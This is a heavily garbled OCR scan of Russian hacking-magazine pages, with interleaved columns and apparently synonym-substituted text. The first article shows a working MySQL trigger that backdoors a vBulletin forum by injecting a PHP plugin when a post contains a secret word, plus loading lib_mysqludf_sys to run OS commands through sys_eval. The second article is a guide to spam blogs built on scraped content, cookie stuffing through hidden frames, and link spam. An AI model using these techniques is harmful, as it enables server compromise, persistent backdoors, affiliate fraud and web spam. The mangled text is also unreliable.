привести в исполнение nроверку цельно со ти данных ,

сносках) .

nоддерживать разночтение хранимых

логирование, а вот и все установку скрытых бэкдоров

При создании хранимых nроцедур нужно

nроцедур- триггеры, которые автопилотом

на веб-nриложениях . Для создания триггера во

принимать к сведению следующие моменты:

вызываются nри настуnлении на базе данных событий INSERT, UPDATE равным образом DELETE. Для

MySQL версий впредь до 0.1 .6 нужны nривилегии SUPER, nосле 0.1.6- nривилегия TRIGGER.

создания хранимой nроцедуры, функции тож

Синтаксис триггера кончено nр касательно ст:

работать. Это не запрещается выработать из nомощью

CREATE [DEFINER={ nользователь 0 CURRENT_USER }] TRIGGER trigg_name trigg_time trigg_event ON tЫ_name FOR ЕАСН ROW trigger_body

указания всех таблиц на явном виде <«имя

0.

ко которой они относятся да со которой будут

триггера исnользуются оnераторы CREATE

PROCEDURE, CREATE FUNCTION да CREATE TRIGGER соответственно. Вызов хранимой nроцедуры nроисходит не без; nомощью оnератора

CALL . Функции вызываются изо оnераторов

Лучше наnрямую выделять базу данных,

конструкции

<<USE <имя базы данных»> другими словами

базы данных>.<имя таблицы»>.

0.

аккуратно приблизительно же, как бы равно любые прочие функции, в таком случае

При исnользовании множественных оnераторов на теле nроцедуры необходимо иметь способ отсылки строк заnросов,

лакомиться посредством направление имени функции [данный

Основные nара метры, которые н ужно з адать nри

содержащих изотрон '; '. Если автор

событие вnолне может оказываться исnользован на SQL

создании триггера, это:

работаем путем консоль, ведь выудить

инъекциях), а триггеры вызываются сами, ежели

0.

на БД настуnило некоторое история [INSERT,

UPDATE, DELETE), nозтому с целью нас они будут nредставпять пиковый интерес. Введу

tгiggeг _name- термин триггера , на поверку

сего дозволяется вместе с nомощью исnользования

можетбытьлюбы м.

команды <<delimiter>>. Если но наш брат работаем на

0. tгiggeг _time- время, когда-когда триггер бросьте вы­ nолнен. Тут возможны пара з начения : BEFORE да

nоnулярном менеджере баз данных phpMyAdmin, ведь новоявленный спейсер не возбраняется nросто

AFТER, соответственно, по иначе nосле заnроса.

определить во nоле <<Разделитель >> nри создании

Событие INSERT означает вставку новой

Здесь существенно отметить, что, коли пишущий сии строки выставили

nроцедуры, команду <<delimiteг>> во этом случае

строки во таблицу равным образом реализуется одним изо

tгiggeг _time во BEFORE, так триггер довольно вам nол-

исnользовать отнюдь не нужно.

уточнения:

Как различимо изо тела триггера, на соответствующем nереональном

дамnы. После изучения различий сделанных в nредыдущем шаге

сообщении наш брат сможем раскопать авторизационные документация любого

дамnов становится ясно, что-то nлагин из именем

зарегистрированного возьми форуме nользователя. Данный nрием не грех

шифр

nрименять nрактически пользу кого любого форума, работающего вместе с

MySQL 0.

aj4x, содержащий <<print_r(ini_get_all{)) >>, короче создан nосле выnолнения следующих SQL заnросов:

Для сего нужно всего делов только лишь отыскать таблицу не без; авторизационными данными юзеров равным образом таблицу не без; текстами nереанальных сообщений. При исnользовании триггеров нас неграмотный изо всех сил интересует логика форумного движка, где-то вроде до сей времени маниnуляции nроисходят получи уровне базы данных .

INSERT INTO 'datastore' VALUES ( 'pluginlist' , 'a:1:{s :13: "ajax_complete";s:25: "print_r(ini_get_all() ); \r\n\";}' ,

0 ); КРОШИМ «БУЛКУ» Также триггеры дают нам nрекрасный возможность nо-новому осмыслить давно известные уязвимости. Наnример, во админ-nанели форума

INSERT INTO 'plugin'

РНР-кода на nлагины. Этот событие дозволено расценивать в качестве кого сговорчивый

( 'pluginid' , 'title' , 'hookname' , 'phpcode' , 'product' , 'devkey' , 'active' , 'executionorder' )

механизм на админа согласно расширению функцианала форума, да

VALUES

мы, известно же, будем осматривать его во вкусе уязвимость:). В дан­

( 0 , 'aj4x' , 'ajax_complete' , 'print_r(ini_get_all());' , 'vbulletin' ,

vBulletin 0 nрисутствует случай вставки nроизвольнога

ном случае такая чувствительность хорошенького понемножку группироваться по образу «post

auth Admin Panel Code Execution >>. Как твоя милость поуже обязан был nонять,

0 , 0);

организовывать nлагины не без; РНР-кодом дозволительно безграмотный всего лишь с админки, но в свою очередь равным образом сквозь базу форума. Чтобы nонять, по образу сие совершить из базы, тебе совершенно далеко не нужно подрабатывать километры кода, а надобно

При этом, разве да мы из тобой обратимся для файлу vb foгuma . net/ajax . php , то отечественный адрес во nлагине усnешно выnолнится! Такую технику вnолне

равно стоит изготовить двоечка дамnа БД: дамn, нет-нет да и nлагинов до настоящий поры

дозволяется исnользовать ради создания триггера, какой-никакой на случае

нет, равно дамn приёмом nосле добавления любого nлагина от nомощью

а nозволит выnолнить шифр держи нужном нам форуме . Однако

оnисанного превыше триггера. Затем тебе никуда не денешься уравнить сии

бросать nлагин от nодозрительным рhр-кодом в долгие годы во

060

ХАКЕР 01 / 054/ 0011


Бэкдор во БД

СТАРЫЕ ТРЮКИ С

LIB_MYSQLUDF _SYS

UDF

·~-...~~ 0- e~r~utes

~У."

.. ~...- - @XKUt~ an a rЫtrary

да на сильнее ранних версиях MySQL [еще перед появления хранимых

т

?,.,. - get!O ttle value. of o.n envlronment Yart.1Ыe.

процедур во этой СУБД! пользу кого поддержки в такой мере называемых UDF

• ~~- ~t •

Важно отметить, что-нибудь команда

CREATE FUNCTION использовался

an arЬitrarv command, and I'@'Wms lt's output. comm.1nd, and returns lt''!l ~xlt code.

crute an envlronment

varlaЫe,

or upd.JI.c the value of an eal5ting en Yironment

Yilllri<IЬie.

[определенные пользователем функции!. UОF-функции продолжают поддерживаться

MySQL равным образом могут рассматриваться

в качестве кого внешние хранимые функции . В звезда ото обычных хранимых

rp_ev11l -'Y=_c•<Jl tlkes

ом

c;omm.and wtng

iii''IJUПient

0nd

• • кutes

lt. Jeturnlng 01:5 outpyt.

функций, которые за сути состоят изо нескольких SQL-операторов,

UDF-функции могут куда увеличивать функциональность СУБД . Несколько полет отдавать широкой публике был представлен

Описание б иблиотеки

lib_mysqludf_sys в

из айте

mysqludf.org

эксплоит, представляющий из себя UDF-функцию, которая позволяла совершать команды операционной системы. Все зто относилось для

MySQL 0- пятой версии если на то пошло снова без затей невыгодный было. Со

временем подобная функциональная была реализована закачаешься вполне легитимном модуле

LIB_MYSQLUDF_SYS,

кто неотложно доступен

к загрузки со специального ресурса, посвященного

FOR ЕАСН ROW BEGIN IF NEW.pagetext='mynewtestdata' THEN SET @exists_plugin=(SELECT data FROM 'vb' . 'datastore' WHERE 'datastore' . 'title'='pluginlist' );

UDF-

фунциям [ mysqludf.oгg l. Библиотека заключает на себя гряда функций , позволяющих взаимодействовать из операционной системой, на которой запущена СУБД . Учитывая простоту на установке

UDF-

UPDATE 'vb' . 'pmtext' SET 'message'=@exists_plugin WHERE 'pmtext' . 'title'='aj4x' ;

функций, сие в полном смысле слова неподдельный манера нахватать теледоступ ко системе.

Делается сие так:

0.

DELETE FROM 'vb' . 'datastore' WHERE title='pluginlist' ;

Достаточнолишь из колебать от указанного раньше сайта [или из нашего

диска! картотека lib_mysqludf_sys_O.O.З . taг.gz, выискать со временем уж скомпи­ ленный бинарник равно свести его на диpeктopию/usг/lib/mysql/ plugiпs.

INSERT INTO 'vb' . 'datastore' VALUES ( 'pluginlist' , 'а :1:{s:13: "ajax_ccщ:>lete"~s :23: "print_r(ini_get_all() ); ";}' , 1 );

0. Далее на базе данных нуждаться привести в исполнение следующую команду: DELETE FROM 'vb' . 'plugin' ; CREATE FUNCTION sys_eval RETURNS striпg SONAME 'lib_mysqludf_sys.so' ; 3. После чеготебе достаточно доступна занятие sys_eval, позволяющая выполнитьлюбую системную команду:

select sys_eval ( 'id' ) uid=60(mysql) gid=107(mysql) groups=107(mysql),e(root) Данный образ словно бы по всем статьям хорош, однако, на нем вкушать одно большое но: директории, на которых нужно распределять обложка

lib_ mysqludf_sys.so, доступны бери переписывание лишь суперпользователю, позтому настоящий модификация дозволительно испытывать только лишь как бы установку

INSERT INTO 'vb' . 'plugin' ( 'pluginid' , 'title' , 'hookname' , 'phpcode' , 'product' , 'devkey' , 'active' , 'executionorder' ) VALUES ( 0, 'aj4x' , 'ajax_complete' , 'print_r(ini_get_all());' , 'vbulletin' , " , 0, 0); END IF; END~

Связав установленный триггер не без; базой форума, создав получи форуме положение не без;

бэкдора, а безвыгодный градиент атаки. Хотя, конечно, буде админ накосячил

секретным одним словом <<myпewtestdata >> равным образом по времени обратившись ко скрипту

справами [например, правительство /usг/lib/mysql/plugiпs имеет

ajax.php, ты да я увидим, что-то код, прикинутый нами во плагин , успешно

компетенция

выполнится!

0771,

а наш брат возле этом имеем подступ на базу от привилегией

FILE, ведь совсем можем рыпнуться организовать обложка lib_mysqludf_ sys.so не без; через во всем известной конструкции <<SELECT .. .. INTO OUTFILE ». Также, если бы известный обложка полноте скомпилен

Понятно, почто интересах использования любых трюков не без; триггерами равным образом

для похожем сервере, так от большущий долей вероятности дозволено

хранимым процедурами вкушать важное условие- у нас уж полагается

ВМЕСТО ЗАКЛЮЧЕНИЯ

поджидать успешного выполнения системных команд равно возьми целевой

состоять посещение для СУБД. Для сего должен ложок ан да параль какого­

машине . Использовать функцию

либо MySQL-юзepa. Зачастую информация пользу кого соединения из сервером

sys_eval

нам может помочь

программный инструментарий упреждающей защиты АррАгmог, но,

БД прямо хранятся во РНР-скриптах на открытом виде. Даже коли

когда у нас принимать рутный доступ, сие трудность бог подумаешь

веб-приложение накрыто Zепd'ом тож закриптовано loпCube,

обойти, ссылку сверху путь обхода ищи на сносках .

конфиг, идеже заурядно прописывают лаги н равным образом параль ото базы данных, остается доступен пользу кого редактирования, дай тебе уж лично конечный пользователь был способным регистрировать на него необходимые изменения. Поэто­ му, даже если правонарушитель каким-либо образом может декламировать файлы

базе форума безвыгодный является правильным решением, в такой мере наравне сие несложно

нате сервере, то, скорешенько всего, некто найдет равным образом конфиг из доступами ко БД.

может найти админ. При создании триггера желательно проверять

Далее, разве во базу пускают отнюдуже угодно, а никак не всего со

те плагины, которые еще были во базе данных до самого нашего инжекта,

или — или нате часть а сервере находится специализированный софт ради

localhost,

посему счастливый адрес триггера на таком случае хорош наглядеть

работы от БД [например, оный но самый phpMyAdmiпl, то, получив

приближённо так:

документация изо конфига приложения, кракер тотально может попасть равно

CREATE TRIGGER 'vb_pluggin' BE FORE INS ERT ON 'vb' . 'post'

условии проникновения для хает частенько безграмотный является сверхслож­

на саму базу данных . Короче говоря, добывание доступа ко БД около

ХАКЕ Р

01 /154/2011

утнапиштим задачей. ::Х:

06 0


вэпом

RushteR (rushter.coml

ess через А вплоть до Я

в Word

AKCOЗiJ.ATb

СВОЙ nlfP.BЫЙ СПАМ-БЛОГ И НА НЕМ ЗАРАБОТАТЬ Если у тебя снедать близкий сайт не ведь — не то блог, то ты мамой клянусь был в силах заметить, в духе кое-кто

сайты автопилотом копируют твой контент, тем самым отнимая твоих

• Известный симпозиум что касается доменах: gQ!МJ)J.QrJHJ1.fi~l • Известный SEO форум: ~~·LY

• Сервиспроверки траста xt Яндексе:

ШШц • Интересный блоr по отношению после раб интернете:

'

~ _р

• Качественный nоказатель посещаемости сайта :

i!l~~

• Сплоrи Q.i! yjor

для Википедии:

Сервисы

AddUrl

~·.., · ~

•Google: •GoGo: •WebAita:

сплогами. Если присутствовать точнее, в таком случае сие

• Yahoo:

ради вычисление других ресурсов. Как они

создаются?

или — или аддурилки:

•Яндекс:

посетителей. Такие сайты называются

обычные паразиты, зарабатывающие

на

•RamЫer:

tlr

( 1 \

\


Сплоги получи и распишись WordPress с А прежде Я

О МЕНЫ Минимум теории . Сплог- сие сайт-блог, сгенерированный чтобы раскрут-

Следующий спрос - коллекция домена на сплога. Тут лакомиться двушничек пути:

ки других сайтов. По своему виду возлюбленный похож получай обыкновенный блог, однако

запись свежих другими словами выкуп драп-доме н ов. Со свежими домена­

основа различие заключается во контенте, какой-никакой малограмотный является ни

ми проблем гора н икнуть невыгодный должно: здесь постоянно стандартно. Могу исключительно

качественным, ни уникальным. Как правило, сущность сайта сге­

навести выделять зону, исходя с языка , по-под кой делается

нерировано целиком автопилотом не без; использованием RSS-лент

сплог. Также преимуществом хорош затрагивание тематического фразы

или — или прямого парсингадругих ресурсов . В целом но схему создания да

во имени домена. Интереснее переделка от « дропами >>. Это домены,

монетизации такого сайта позволительно поведать на 0 шага х:

неграмотный продленные бывшим хозяином и, таким образом, доступные про

0. 2. 3.

Создается сплог;

регистрации любому желающему. «За нежели нужен дроп? >>, - можешь

Идет быстрое или — или постепенное насыщение сплога

не без; умолять твоя милость . Все просто: сайт, находившийся в этом домене, имел

чужим контенто м;

касательно пределенный ватерпас доверия со стороны поисковых систем ради контокоррент

Выбираетсяпутьзаработка[баннеры,партнерки,

входящих получи него ссылок, ведь снедать около новой регистрации сии ссылки

прогресс други х сайтов равным образом т.п.l;

перейдут для новому хозяину. А сие многого стоит!

0. Ус танавливаются соответствующие вместе с крипты ради выбранного

Для поиска позволяется использовать в своих интересах замечательным бесплатным сер висом justdгopped.com . Но советую малограмотный изнывать от поиском дропов,

пути из-за работка;

0. Начина е тся раскрутка сплога во поисковых системах; 6. Сплогумирает; 7. Переходим назад для пункту 0.

а несложно сыскать людей, которые продают информацию об таких до­

менах вслед за деньги. П ри использовании дро п ов нужен первоначальный опыт, так наравне снедать важный счастливый случай накопить дескать н ьги во п устую, п оэтому сразу начинать из них никак не стоит. Простой имей сие во виду.

В этом материале ваш покорнейший слуга хочу задеть аспекта создания сплога равным образом его

КОНТЕНТ

монетизации. И первое, со аюшки? наш брат начнем,- э в таком случае избрание платформы

Основная рецепт сплога во том, что-нибудь контент пользу кого него генерируется

про размещения сп лога.

непроизвольно [или полуавтоматически!. Основным источником

ПЛАТФОРМА

ко нтента на от плогов являются RSS-фиды. Обычно их используют

Есть банан варианта : бесплатные блогохостинги сиречь частный

<< наравне глотать >>, однако бывают случаи, рано или поздно контент проходит синонимиза­

хос тинг со своими доменами . В качестве блогохостинга твоя милость можешь

цию, ручную редакцию либо — либо безотчетный перевод. Если нужны

эксплуатнуть Ыoggeг.com , livejouгпal.com либо — либо woгdpгess.com . Эти сер­

долгоживущие сплоги, ведь к основные принципы паче не разрешить копирайтили

висы являются бесплатными равным образом самыми популярными середи сплогеров.

рерайт 00-15 статей у людей в специализированных форумах равно

У ни х лакомиться пара огромных п люса: бесплатное приложение равным образом милость

запостить полученные тексты автоматизированный для кровный спло г на процесс

со стороны поисковых систем. Однако поглощать равным образом серьезные минусы :

месяцев. Уникальный ко н тент п оможет спло г у нанять п ервоначаль­

0.

Наличие неиллюзорной вероятности получения ба возьми после агрегацию

ный траст, тем самым спло г достаточно белее во глазах поисковых систем.

В качестве оптимального варианта подойдет контент насчёт д инаковой

контента изо др у гих источников;

0. Отсутствие потенциал подключения плагинов, облегчающих 3.

0-2

тематики, подобранный от большого количества те матических ресурсов

работу сплогера;

равно жидкий анонсами. Грубейшая ошибка-парсингвсего только

Потребность на соф те про пастин га .

пары-тройки новсетных сайтов. Такие сплоги будут забанены во тече­

Более опытные сплогеры используют принадлежащий хос тинг равно

систем. Начинать со большого количества постов малограмотный стоит, предварительно

ние испарения месяцев, а могут равно общо отнюдь не попасть во дефлятор поисковы х домены. В качестве хости нга оптимальным решением достаточно исполь­ зова ние

нужно поселять неграмотный хлеще одного поста на сутки , а спустя время постепен­

vds или — или своего сервера, приблизительно вроде владельцы shагеd-хостингов

только приумножать объемы постинга. Помимо классических сплогов

со больший вероятностью попросят сплогера съехать изо -з а крупный

существуют равно оставшиеся их виды. Например, нет-нет да и во качестве контента

нагрузки, генерируемой сплогами. Лучше заблаговременно обезопаситься с

используются вещи с интернет-магазинов. Такие сплоги качественно

таких проблем. Также малограмотный есть расчет размыкивать равно об авторских правах. Если

генерируют продажи во партнерских программах. К сожалению, бес­

парсить серьезные источники, так могут подойти а бузы [официальные

платных вариантов д ля наполнения таких сплогов неграмотный существует, однако

жалобы! через правообладателей. Очевидно, в чем дело? злить их неграмотный стоит,­

позволяется попытать счастья разыскать специализированные проги tЬрЗ либо — либо

л е гче лишь не мудрствуя лукаво уничтожить запрошенные авторами записи.

нате простерах Сети.

ПОЛЕ ЗНЫЕ ДЛЯ СПЛОГА П ЛАГИНЫ

BRush

WORDPR ESS

Xmlsite map

Platinum Seo Pack

WP Super Cache

Popular Posts

Simple Tags

b jЦ y/9Kcq9Z

bjt.ly/QGOMs

Ьj t.J y/2JRrnaq

.!ill.1YLfiQ1

Ьit.J y/1IдGjC

Данный плагин генерирует

Этот плагин улучшает на ну-

Плагин, снижающий зарабатывать

Плагин, тот или другой улучшает

Плагин в целях автоматическо-

Х МL-карту сайта равным образом помога-

треннюю SЕ-оптимизацию

грузку получи хостинг. Когда

внутреннююперелинковк~

го создания равным образом оптимизации

етускорить индексацию сверху

твоего блага равным образом занимает

количествотвоихсплогов

Он выводитсамые популяр-

меток.Позволяетподби-

первых время х, что такое? ну да из т немного

во-вторых район соответственно важности на

перевалитза 00, ведь WP Supeг

ные статьи твоего сплога во

армия метки равно порождать изо

н ять поисковым системам,

делесозданиясплога.Сре-

Cache поможетс у щественно

сайдбаре, тем самым превосходить

них такназываемоеоблако

какие страницы важнее.

д равно функций: канонические

сэкономитьрасходование

давая авторитетность со главной стран и-

тегов. Также улучшает во ну-

Его блок пр оста, кончать

ссылки, оптимизированные

ресурсов. Он может кэширо-

цы для них . Твой штамп дол-

треннюю перелинковку, тем

статоч нолишь а ктивиро-

заголовкистраниц,генера-

вать кое-какие динами-

жен подкреплять виджеты

самым увеличивая трафик.

вать плагин.

ция мета-тегов, перманент-

ческие функции оживка равно

[и настраивается бери вкладке

Облакоустанавливается во

ный редиректна изменен-

выдаватьнекорректную

настроек виджетовl.

области виджетов .

ные адреса страницы.

информацию нате страницах.

ХАК ЕР

01/154/2011

063


хакинг

ПОИСК RSS-ЛEHT Не быть достойным доставать чужие сnиски лент- их нужно набросать самому. Одинаковые сnиски лент для всех сnлогах- nлохое решение. Найти

СПОСОБЫ МОНЕТИЗАЦИИ СПЛОГОВ

RSS-ленты не запрещается во различных каталогах i subscгibe . гu/ca t alog / ?гss. гsspoгtal.гu ]. При отборе лент хоть умри nроверять их бери nолноценность nостов,

0.

Установка стих контекстной рекламы.

понеже кой-какие движки nостят только лишь анонсы статей на RSS, а нужны

В качестве контекстной рекламы вернее только исnользоватьGооglе

ленты из nолными статьями. Источники во сколько бы в таком случае ни стало должны со­

Adsense. Здесьстоитучесть, чтотакиесnлогидолжны казаться

вnадать из тематикой сnлога да малограмотный держать одинаковых статей. К выбору

максимально качественно, ин`аче дозволяется остаться вне выnлат. Сnлоги ,

лент есть расчет nодходить экстремально серьезно: nросматривать сообразно 0-5 статей

основанные получай данном nринциnе, называются MFA IMade fог Adsense].

у каждого источника, круглым счетом по образу вnолне может оказаться, почто сие чей-то

0.

Продвижениедруrихсайтов.

сnлог либо — либо сайт, тот или другой во каждом nосте рекламирует приманка услуги,­

С nродвижением всё-таки весть nросто: nрокачиваем множествосnлогов

такие библиография невыгодный нужны.

схожейтематики равным образом ставим сквозные ссылки получи и распишись надлежащий сайтnо нуж­

Сnисок nараметро в, которые хотелось бы nроверять у сайта­

ным заnросам.

З.

донора:

Количество страниц на индексе побольше

Продажассылок. Для nродажи ссылок позволяется исnользовать сервисы sape . гu тож

Индексация во nоисковых системах;

0. 2. 4. 5. 6.

linkfeed .г u . Для того дабы ссылки раскуnались, у доменадолжен

000;

Количество nубликаций во месяцот5 равно выше;

являться благоустроенный возраст, большой тИЦ да другие SЕО-nоказатели.

Уникальностьстатей;

Также хочу отметить, аюшки? nродажа ссылок-это безвыгодный самый первый

Отсутствие коротких равным образом бессмысленных статей.

сnособмонетизациисnлогов.Из-заnлохогокачестваконтентата­

Теnерь воnрос- что познакомить сие вместе да бессознательно агре­ гировать?

кие сnлоги живут непродолжительно равно никак не усnевают накопить нужные nараметры.

0.

Установка баннеров.

С баннерами всесугубо индивидуально. Находим людей, которым нужентрафик в соответствии с схожейтематике равным образом устанавливаем их баннер. Ставить В качестве сnлогерского блик несомненным лидером является

баннер соответственно количествукликов архи отнюдь не рекомендую, вернее nродавать

WoгdPгess (альтернативой может существовать Dгupal сиречь DLE]. Для ворд­

еготолькоза фиксированную nлату. Стоит отметить, зачем далеко не первый попавшийся nо­

nресса принимать целешенький колонна nлагинов, облегчающих формирование сnлогов равным образом

куnател ь захочет скуnать ба н н ер н ы й траффик со сnлогов исключительно nотому,

у величивающих величина трафика. Основоnолагающий nлагин ради

зачем этосnлоги :-].

сnлогера- это, естественно же, FeedWoгdPгess. Он nозволяет осу­

0.

Партнерские магазины.

ществлять машинный реnостинг с выбранных RSS-лент. Вот

Исnользование nартнерских магазинов однако чище равным образом сильнее набирает

отдельный с его возможностей:

nоnулярность. Сnлоги изначальносоздаются со товарами, да во каждом nосте существуетссылка получи и распишись сайт с целью их nокуnки.

nоддержка

0. Cookie stuffing.

RSS/Atom;

Также не запрещается исnользовать технологию cookie stuffing ( Ьit .l y/pObKhh ].

автоматическое изделие категорий;

расположение анонса тож nолной статьи;

Она nозволяет nодставить nартнерские кукинамножество магазинов.

включение/отключение

Для сего стоит nодгрузить nартнерский лабаз на скрытом

комментариев;

избрание автора;

фрейме. Пользователь, nросматривающий сайты изо выдачи равным образом выби­ рающий nодходящий ему магазин, может наткнуться нате твои сnлоги и,

nакетное дополнение лент; отсутствие необходимости

исnользовать

cron.

соответственно, nолучить твои куки. А nосле куnить как бы во одном из твоих магазинов. Кстати, самой nоnулярной nартнерской nрограммой

Так вроде сие центральный nлагин, моя особа оnишу nодробный nлан действий:

0. После установки нужно nерейти на раздел <<Syndication », идеже вы­ бирается nодраздел «Posts & Links >>. В разделе «New posts >> уста­ новим галочку «Hold syndicated posts fог гeview; maгk as Pending >>, а в разделе «Peгmalinks point !о: >> установим галочку наnротив «The local сору оп this website >>. Не забываем сэкономить однако сделанные

на nродажи реальныхтоваров является тотсамый

nредварительно найденные по мнению моим советам, инажмем кноnку

«Add >>. После зто го nлагин nроверит достоверность источников и nредложит nодnисаться возьми них. Нажимаем «Subscгibe to selected

изменения.

0. Теnерьдобавим список источников RSS, на сего мы советую восnользо­ ваться встроенной nакетной функцией «add multiple>>, которая на­ ходится возьми вкладке <<Syndication >>. Вставим тама сnисок RSS-лент,

Amazon.com, ино­

гда nроцентная цена от nродаж нате нем доходит прежде 05%.

гesouгces >> .

0. Далее выбираем добавленные блоги во сnиске «Syndicated гesouгces >> да нажимаем <<Update checked >>. Чем сильнее сnисок, тем дольше обновление, nоэтому nридется капельку nодождать.

Product Category

Fixed Advertising Fee Rates

Electronics Products

0.00%

Amazon

МРЗ

Products

0.

Из-за настроек nервого nункта всегда заnиси будут надеяться nроверки, nоэтомустоитвручнуюустановитьвремяnубликацииираскидать зти заnиси для nостинг во движение

0.

0-2 месяцев.

После того, в духе nройдет 0 месяца, нужно отдать назад настройки nерво­

00.00%

го nункта обратно. Первый равно nятый nункты дозволяется равно невыгодный выnолнять,

Amazon Video On Demand Products

00.00%

только моя особа рекомендую неграмотный предпринимать свежоповатый сnлог вмиг от большого коли­ чества заnисей.

Game Downloads Products

00.00%

Endless.com and smallparts.com Products

05.00%

Gift Cards RedeemaЫe on the Amazon Site

0.00%

Процентные ставки в

06~

Amazon.com

Помимо FeedWoгdPгess питаться целенький линия других nолезных рас­ ширений, которые автор этих строк nривел нет слов врезке. Главный nроблемой связки WoгdPгess равным образом nлагинов является большая нагрузка, которую, вnрочем, не запрещается наполовину постановить вместе с nомощью nлагинов на кэши­

рования. Могу предоставить сызнова небольшую толику советов. После установки соот­ ветствующей CMS отпустило мгновенно отключить выполнимость комменти­ рования. Также отличается как небо с земли упрятать

RSS другими словами nостить тама исключительно анонсы

ХАКЕР

01/154/2011


взламывание

Запланированные обковпеюUI Последнее обновление:

0 ми горох ago

СледУющее обновление:

обнов11Ть no rрафшсу (every 00 minutes)

График обновлений :

Ка для инструмент го

@

G

FeedWordPress долже н терпеть ,

n ока л е нта б)'Ает roro во a ко обновn ен шо?

Иа1оль зо ваrь общие н астрой ки (c:eliчa c

б Ждать

00

00 м 01нут)

микут междУ об н касательно вл ен ltЯ 0..4 01 .

Ре.:оuендацмя . П ока во ы н е уве р е н ы, на ы н е должны н астр а1t вать

FeedWordPress держи об н что касается вл е н 01& чаще нежели в один из дней е 00 минуr.

Мн оn•е ве бм асте ра счита надстройка частые з аn росы н а обно вn е н 0tе е редон что касается сн ыt.ш АПЯ сер еера

да мo ryr nожал относительно ваться возьми ва с. вnлотъ впредь до ба н а ва шего аккауктэ бери ХОСТ11 нrе .

Замечание. настро й ки

Fe edWordPress nо-умопча н аtю исnользуют из-за ма н11роеанн ое обно еn ен • t е шимоза ь коесnи nентэ н е согласен ет нщсакшс данн ых насчёт б обн оаленшu.. Ecn11 кинокартина nредоставляет 0\ Нф относительно рмаци ю о ), FeediNordPress бm,ет 0tсnользо взтъ эщ Аанные .

з ама н аt ро ванн ом об н овлени равным образом (ч ер ез та какой эле м ент, наравне < гss : ttl > иmt < S y :update.Fгe.que.nc y>

Настрой ко равным образом обновл ения

FeedWordPress

НА ЧЕМ ОСНОВАН Т РАСТ ПОИСКОВЫХ СИСТЕМ? Е вместе с ть н йес колько под масть метров , влияющих получай уровеньдоверия поисковиков.

0.

0.

З.

0.

0. 6.

Время нахожде н ия во индексе .

ЗАРУБЕЖНЫЕ ВЕБМАСТЕРЫ УЖЕ ДАВНО ОТОШЛИ ОТ ТЕМЫ ДОРВЕЕВ В ПОЛЬЗУ СПЛОГОВ бы не без; тро надоес т ь , п оэтом у вместе с тоит собрать немно го денег бери от п е­

Чем длительнее сайт находится во индексе поисковой системы, тем

циализирова н ные пр в отношении граммы

ранее степеньдоверия ко нему.

сервисы социальных закладок » !. В качестве д по отношению полнительного не без; п фигура

[Google -7 « Автоматический пастин г на

Ссылк равным образом н а са йт.

п по части п адания на показатель допускается на получи от триада х св ое й

Чем значительнее естественных, а далеко не покупных ссылок, ведут бери сайт,

у п равления контентом я погов касательно рим ниже! примолвить сервисы на

CMS [ в рассуждении выборе сис т емы

тем вне поисковые системы его оценивают.

RРС - пинга [ равным образом х не без; писок равным образом л е ж ит нате диске!. В WoгdPгess настройки

Внешни е сс ы лки .

RPC

Чем значительнее в сайте внешних ссылок , тем меньшеуровень доверия.

токол

Качество сайта:

поле. Е со л да е от ть кайфовый з дозволяется из ть про пр в рассуждении ставпения << жирных >> [трастовы х

• исключительность да острота контента; • редкостность стр у ктуры; • внутренняя оптимизация; • натиск загрузки страниц; • валидный синтаксис HTML; • наличествование контактов вместе с админами/разработчиками.

равно пиар ис твоя милость хl сс ылок , так до равным образом нде для сацией в обязательном порядке п роставить

н ахо дя тс мы получай вкладке << Напи со ани е » : з мол не без; ь н у жно влить пр что до ­

XML-RPC равно

втереть спис что до ко п рил в отношении ж е нны х мной сл у жб на нижнее

нескольк касательно та ких со из ылок бери главн у ю стра н ицу равным образом Н Т М L-карту сплога. После индек вместе с ации позволяется плав н по части у величивать сумма на х одящих с от ылок. Прокачиваем главн у ю равно из ами посты. П осле в таком случае го, наравне со пл по отношению г

п рожив ет

0-3 месяца , дозволительно п рос памить его соответственно ф об р у мам другими словами благ ам. 50-60 % с на сех ссылок в оnубликованные п осты равным образом

Лучше совершенно го побеждать

Посещае м волос са й та .

проспамить равным образом х любым дост у пным из офтом [ н аверняка твоя милость слышал ради

Дру г ие факторы .

Xгumeгl . Так а у становим таллиман не без; та т истики, ко п римеру, l i veinteгnet. Такой сче т чик nо з волит просчитать доля да качес т в посетителей.

Ни одна с поисковых систем отроду невыгодный раскроет аб от олютно

П в отношении мере ро со та не без; пл в отношении га тебе б ванька-встанька ет видно, из каких не без; т раниц согласен в отношении вместе с новно й

на не без; е факторы, влияю щ ие н а уровен ь доверия ко тому сиречь иному сайту,

пробка . С по отношению вет ую вз глян у ть получай п эскер иции сих от т раниц на п касательно ис ко овы х

поэтом у тебе ос т ается только что экспериментировать.

системах . Е не без; ли лист безвыгодный н ахти одится во топ-5 , ей т в отношении чн по отношению безграмотный помешают хорошие вх об д пишущий эти строки щие ссылки.

ста т ей. Это позволит вслед щ ититься с плохого влияния держи сплоги со

После установки сумме описанного вне стаффа равно выпол н ения на­

стороны других вебмастеров.

меченного плана соответственно раскрутке из мело дозволительно п подвергнуть проверке различ ­

ные от пособы монетиза ц ии !см . врезку!. И ... пристуnать для созданию следующего сплога. В любом случае, отдельный последний спло г- сие

Неотъемлемой составляющей сплогов является шаблон. Не целесообразно

черт-те что творческое равным образом неповторимое. Н икто отнюдь не расскажет тебе в готовности

вытворять порядком сплогов бери од н ом шаблоне, беспричинно равно как поисковые

ре ц епт. В верно н ном случае могу как только научить сходствовать за

системы был в силах у т nриня т ь

от п ециализированным форумам с сносок-там п по части крупицам не возбраняется

не без; п логи вслед за нехорошую спамерскую сетку.

Л учшим вариантом хорошенького понемножку использова н ие исключительно г по отношению шаблона или — или

отлично передела н однако г касательно бесплатного. Если неграмотный неймется самому

выудить нужную равным образом актуальную сплоговую информацию. В этой из татье моя особа описал больший сверток к держи ч инающих

совершать шабло н ы, иначе н е до черта зна н ий ради сего , дозволяется от кидать

сплогеров. Зарубежные вебмастеры сделано давным-давно от ш ли с темы

бесплат н ые- возьми п ример, со xtemplate.гu тож Ыogstyle.гu . Также отнюдь не

дорвеев на польз у сплогов. Их доход очевидна, они перед этих пор

забываем долой спрятанные ссылки и, возможно, бзкдоры на их

приносят х ороший зарабо т ок, отнюдь не используя около э т ом никаких

коде [в бесплатных шаблонах часто со п рята н ы линки, со через

противозаконных технологий , во крест ото этого д няшних технологий

которых нечестные вебмастеры прокачивают близкие сайты l .

изготовления дорвеев. Минусом качественных сплогов является nо­

требность на прирученный работе, по части з тому после этого возникает предмет внимания со мас­ совым nроизводством. Если твоя милость реши л заварить кашу брать уроки сплогами ,

Каждый программист на основном придерживается собственной стра­

